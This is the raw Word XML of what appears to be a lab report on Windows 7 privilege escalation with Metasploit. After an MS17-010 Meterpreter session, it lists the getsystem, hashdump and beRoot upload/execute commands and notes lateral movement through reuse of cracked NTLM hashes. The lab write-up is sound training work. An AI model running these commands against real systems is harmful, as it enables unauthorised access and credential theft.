    <w:p w14:paraId="5F87A5E8" w14:textId="77777777" w:rsidR="005674D0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Figure 6: Meterpreter Session Opened via MS17-010</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F494AA" w14:textId="77777777" w:rsidR="005674D0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="privilege-verification"/>
      <w:bookmarkEnd w:id="14"/>
      <w:r>
        <w:t>4.3 Privilege Verification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF8205D" w14:textId="77777777" w:rsidR="005674D0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FFE6B20" w14:textId="77777777" w:rsidR="005674D0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t>getuid</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t>getsystem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E606E35" w14:textId="77777777" w:rsidR="005674D0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Result: NT AUTHORITY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2827670A" w14:textId="5A547083" w:rsidR="00884FE0" w:rsidRPr="00884FE0" w:rsidRDefault="00884FE0" w:rsidP="00884FE0">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r w:rsidRPr="00DF1B3A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="746D322B" wp14:editId="1C2AA0FF">
            <wp:extent cx="5731510" cy="1288415"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6985"/>
            <wp:docPr id="249427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4271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0E150" w14:textId="77777777" w:rsidR="005674D0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Figure 7: Privilege Escalation Verification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09808FDC" w14:textId="77777777" w:rsidR="005674D0" w:rsidRDefault="00000000">
      <w:r>
        <w:pict w14:anchorId="30A5D7EA">
          <v:rect id="_x0000_i1030" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="241B9D93" w14:textId="77777777" w:rsidR="005674D0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="post-exploitation-activities"/>
      <w:bookmarkEnd w:id="12"/>
      <w:bookmarkEnd w:id="15"/>
      <w:r>
        <w:t>5. Post-Exploitation Activities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5278E226" w14:textId="77777777" w:rsidR="005674D0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="credential-dumping"/>
      <w:r>
        <w:t>5.1 Credential Dumping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0288AC2B" w14:textId="1B11F6AF" w:rsidR="005674D0" w:rsidRDefault="00000000" w:rsidP="007A7439">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>Command:</w:t>
      </w:r>
      <w:r w:rsidR="007A7439" w:rsidRPr="007A7439">
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007A7439">
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t>hashdump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E91B62" w14:textId="55C6A07D" w:rsidR="00CC066C" w:rsidRPr="00CC066C" w:rsidRDefault="00C02808" w:rsidP="00CC066C">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="0B70AB0C">
          <v:rect id="Ink 11" o:spid="_x0000_s1040" style="position:absolute;margin-left:9.45pt;margin-top:86.9pt;width:8.8pt;height:8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origin="1" coordsize="212,197" filled="f" strokecolor="#e71224" strokeweight="1mm">
            <v:stroke endcap="round"/>
            <v:path shadowok="f" o:extrusionok="f" fillok="f" insetpenok="f"/>
            <o:lock v:ext="edit" rotation="t" text="t"/>
            <o:ink i="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" annotation="t"/>
          </v:rect>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="298F30DF">
          <v:rect id="Ink 10" o:spid="_x0000_s1039" style="position:absolute;margin-left:18.6pt;margin-top:88.9pt;width:106.45pt;height:304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coordorigin=",1" coordsize="509,1" filled="f" strokecolor="#e71224" strokeweight="1mm">
            <v:stroke endcap="round"/>
            <v:imagedata croptop="-3467608f" cropleft="-338698f"/>
            <v:path shadowok="f" o:extrusionok="f" fillok="f" insetpenok="f"/>
            <o:lock v:ext="edit" rotation="t" text="t"/>
            <o:ink i="AGcdAjwMARBYz1SK5pfFT48G+LrS4ZsiAwtIEETnpZABRWRGZAUDOAtkGSMyCoHH//8PgMf//w8z&#10;CoHH//8PgMf//w84CQD+/wMAAAAAAAoYAgoAH8ACUBBdNV01CgARIABw7RBZ9tsB&#10;" annotation="t"/>
          </v:rect>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="7CD23F3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nk 8" o:spid="_x0000_s1038" type="#_x0000_t75" style="position:absolute;margin-left:17.5pt;margin-top:89.1pt;width:14.2pt;height:4.1pt;rotation:-281149fd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">
            <v:imagedata r:id="rId11" o:title=""/>
            <o:lock v:ext="edit" rotation="t" aspectratio="f"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="2E431D8F">
          <v:rect id="Ink 5" o:spid="_x0000_s1037" style="position:absolute;margin-left:130.65pt;margin-top:88.75pt;width:228.4pt;height:11.5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7706,65" filled="f" strokecolor="#e71224" strokeweight="3.5mm">
            <v:stroke endcap="round"/>
            <v:path shadowok="f" o:extrusionok="f" fillok="f" insetpenok="f"/>
            <o:lock v:ext="edit" rotation="t" text="t"/>
            <o:ink i="AGwdA4YGNAEQWM9UiuaXxU+PBvi60uGbIgMNSBBE56WQAUXeAkbeAgUDOAtkGSMyCoHH//8PgMf/&#10;/w8zCoHH//8PgMf//w84CQD+/wMAAAAAAAoaAg4AAeGQCABAEF7eXt4KABEgcC8yAVn22wH=&#10;" annotation="t"/>
          </v:rect>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="44FB0419">
          <v:rect id="Ink 3" o:spid="_x0000_s1036" style="position:absolute;margin-left:133.65pt;margin-top:79.1pt;width:203.7pt;height:13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coordsize="6837,118" filled="f" strokecolor="#e71224" strokeweight="3.5mm">
            <v:stroke endcap="round"/>
            <v:path shadowok="f" o:extrusionok="f" fillok="f" insetpenok="f"/>
            <o:lock v:ext="edit" rotation="t" text="t"/>
            <o:ink i="AMMBHQOyBTgBEFjPVIrml8VPjwb4utLhmyIDDUgQROelkAFF3gJG3gIFAzgLZBkjMgqBx///D4DH&#10;//8PMwqBx///D4DH//8POAkA/v8DAAAAAAAKcSqHeA8jwGy4ak/D6daJ3vMBgCAy6WQuKrZhnVml&#10;ypXmAhFJ5W0AgMAQGMXikoawsYSYgZ6/IGBScTFQUBCykLEQEFJScBAwRJUF2gSBQETAAIf1c+er&#10;n0AAAACkIDAEBgDhb+YpCgARIPD5A/5Y9tsB&#10;" annotation="t"/>
          </v:rect>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="0CCB89E8">
          <v:rect id="Ink 2" o:spid="_x0000_s1035" style="position:absolute;margin-left:133.6pt;margin-top:67.5pt;width:203.75pt;height:1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coordorigin="1,105" coordsize="6838,1" filled="f" strokecolor="#e71224" strokeweight="3.5mm">
            <v:stroke endcap="round"/>
            <v:path shadowok="f" o:extrusionok="f" fillok="f" insetpenok="f"/>
            <o:lock v:ext="edit" rotation="t" text="t"/>
            <o:ink i="AGwdA7QFLgEQWM9UiuaXxU+PBvi60uGbIgMNSBBE56WQAUXeAkbeAgUDOAtkGSMyCoHH//8PgMf/&#10;/w8zCoHH//8PgMf//w84CQD+/wMAAAAAAAoaAg4ABatgCGlpEF8XXxcKABEgIAld8lj22wH=&#10;" annotation="t"/>
          </v:rect>
        </w:pict>
      </w:r>
      <w:r w:rsidR="00CC066C" w:rsidRPr="007E4922">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0A7EC416" wp14:editId="3C354500">
            <wp:extent cx="5731510" cy="1397000"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1918984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98403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268E9" w14:textId="77777777" w:rsidR="005674D0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Figure 8: Extracted Windows Password Hashes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="062FB878" w14:textId="77777777" w:rsidR="005674D0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Note:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Sensitive hash data is partially redacted in screenshots.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC496F4" w14:textId="77777777" w:rsidR="005674D0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="uploading-and-executing-beroot"/>
      <w:bookmarkEnd w:id="17"/>
      <w:r>
        <w:t>5.2 Uploading and Executing BeRoot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63DFF3CB" w14:textId="77777777" w:rsidR="005674D0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="upload-command"/>
      <w:r>
        <w:t>5.2.1 Upload Command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="219894FB" w14:textId="77777777" w:rsidR="005674D0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t>upload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> /home/tafadzwa/Downloads/beRoot.exe C:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>\\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t>Users</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>\\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t>Public</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>\\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t>beRoot.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E90FDB8" w14:textId="1B627036" w:rsidR="007A7439" w:rsidRDefault="007A7439">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r w:rsidRPr="006E29BD">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2A777E8B" wp14:editId="453E5371">
            <wp:extent cx="5731510" cy="741680"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1270"/>
            <wp:docPr id="473723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230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819AD" w14:textId="77777777" w:rsidR="005674D0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Figure 9: Upload Confirmation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="671E0066" w14:textId="77777777" w:rsidR="005674D0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="execution-command"/>
      <w:bookmarkEnd w:id="19"/>
      <w:r>
        <w:t>5.2.2 Execution Command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05024152" w14:textId="77777777" w:rsidR="005674D0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t>execute</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t>-f</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> C:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>\\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t>Users</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>\\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t>Public</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>\\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t>beRoot.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0273C692" w14:textId="35D231F3" w:rsidR="007A7439" w:rsidRDefault="007A7439">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r w:rsidRPr="006E29BD">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5BD311B7" wp14:editId="4B5B7C89">
            <wp:extent cx="5731510" cy="755650"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
            <wp:docPr id="17976864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6864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885B" w14:textId="77777777" w:rsidR="005674D0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Figure 10: BeRoot Execution Result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DCBF349" w14:textId="77777777" w:rsidR="005674D0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="findings-summary"/>
      <w:bookmarkEnd w:id="18"/>
      <w:bookmarkEnd w:id="20"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>5.3 Findings Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54410465" w14:textId="77777777" w:rsidR="005674D0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>BeRoot identified potential privilege escalation vectors such as service misconfigurations and weak registry permissions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D527E77" w14:textId="77777777" w:rsidR="005674D0" w:rsidRDefault="00000000">
      <w:r>
        <w:pict w14:anchorId="6558F656">
          <v:rect id="_x0000_i1031" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="40CA8B06" w14:textId="77777777" w:rsidR="005674D0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="lateral-movement-considerations"/>
      <w:bookmarkEnd w:id="16"/>
      <w:bookmarkEnd w:id="21"/>
      <w:r>
        <w:t>6. Lateral Movement Considerations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35443F52" w14:textId="77777777" w:rsidR="005674D0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Recovered NTLM hashes can be used for offline cracking. If cracked credentials are reused across other machines, lateral movement via SMB or RDP becomes possible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163DF3F9" w14:textId="77777777" w:rsidR="005674D0" w:rsidRDefault="00000000">
      <w:r>
        <w:pict w14:anchorId="20EF2247">
          <v:rect id="_x0000_i1032" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C5605C" w14:textId="77777777" w:rsidR="005674D0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="legal-and-licensing-disclaimer"/>
      <w:bookmarkEnd w:id="22"/>
      <w:r>
        <w:t>7. Legal and Licensing Disclaimer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0E9F82" w14:textId="77777777" w:rsidR="005674D0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>The Windows 7 ISO used was sourced from archived Microsoft evaluation resources. This setup is for educational and non-commercial purposes only.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="080A2242" w14:textId="77777777" w:rsidR="005674D0" w:rsidRDefault="00000000">
      <w:r>
        <w:pict w14:anchorId="1102B9E3">
          <v:rect id="_x0000_i1033" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D10457" w14:textId="77777777" w:rsidR="005674D0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="conclusion"/>
      <w:bookmarkEnd w:id="23"/>
      <w:r>
        <w:t>8. Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A02038" w14:textId="77777777" w:rsidR="005674D0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>This lab successfully demonstrated Windows privilege escalation using Metasploit, including session management, password hash extraction, and security misconfiguration analysis. Further steps would include integrating log monitoring tools (ELK/Splunk) and implementing hardening measures based on identified vulnerabilities.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:sectPr w:rsidR="005674D0">
      <w:footnotePr>
        <w:numRestart w:val="eachSect"/>
      </w:footnotePr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A22869A4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1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="0000A991"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B7001754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A99411"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CD4ED6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332880345">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="72086159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519465816">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1441297736">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="76706843">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1415275482">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="171259058">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1781795744">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="966276992">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="2129473724">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="13796274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numRestart w:val="eachSect"/>
  </w:foot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5674D0"/>
    <w:rsid w:val="005674D0"/>
    <w:rsid w:val="005A7059"/>
    <w:rsid w:val="007A7439"/>
    <w:rsid w:val="00884FE0"/>
    <w:rsid w:val="00A132B4"/>
    <w:rsid w:val="00C02808"/>
    <w:rsid w:val="00CC0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41"/>
    <o:shapelayout v:ext="edit">
      <o:idmap v:ext="edit" data="1"/>
    </o:shapelayout>
  </w:shapeDefaults>
  <w:decimalSymbol w:val="."/>
  <w:listSeparator w:val=","/>
  <w14:docId w14:val="563A8A77"/>
  <w15:docId w15:val="{CD4FFE52-488C-448C-A087-5549255969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link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00A10FD9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10F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10F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character" w:customStyle="1" w:styleId="Heading1Char">
    <w:name w:val="Heading 1 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00A10F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10F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10F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10F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10F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10F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10F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10F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10FD9"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8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basedOn w:val="FootnoteText"/>
    <w:next w:val="Footnote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156082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462</Words>
  <Characters>3157</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>116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tafadzwa chipere</cp:lastModifiedBy>
  <cp:revision>5</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-07-16T13:22:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-07-16T14:46:00Z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22e914be-6fd9-4ed2-b04d-44baacdb427a</vt:lpwstr>
  </property>
</Properties>
</file>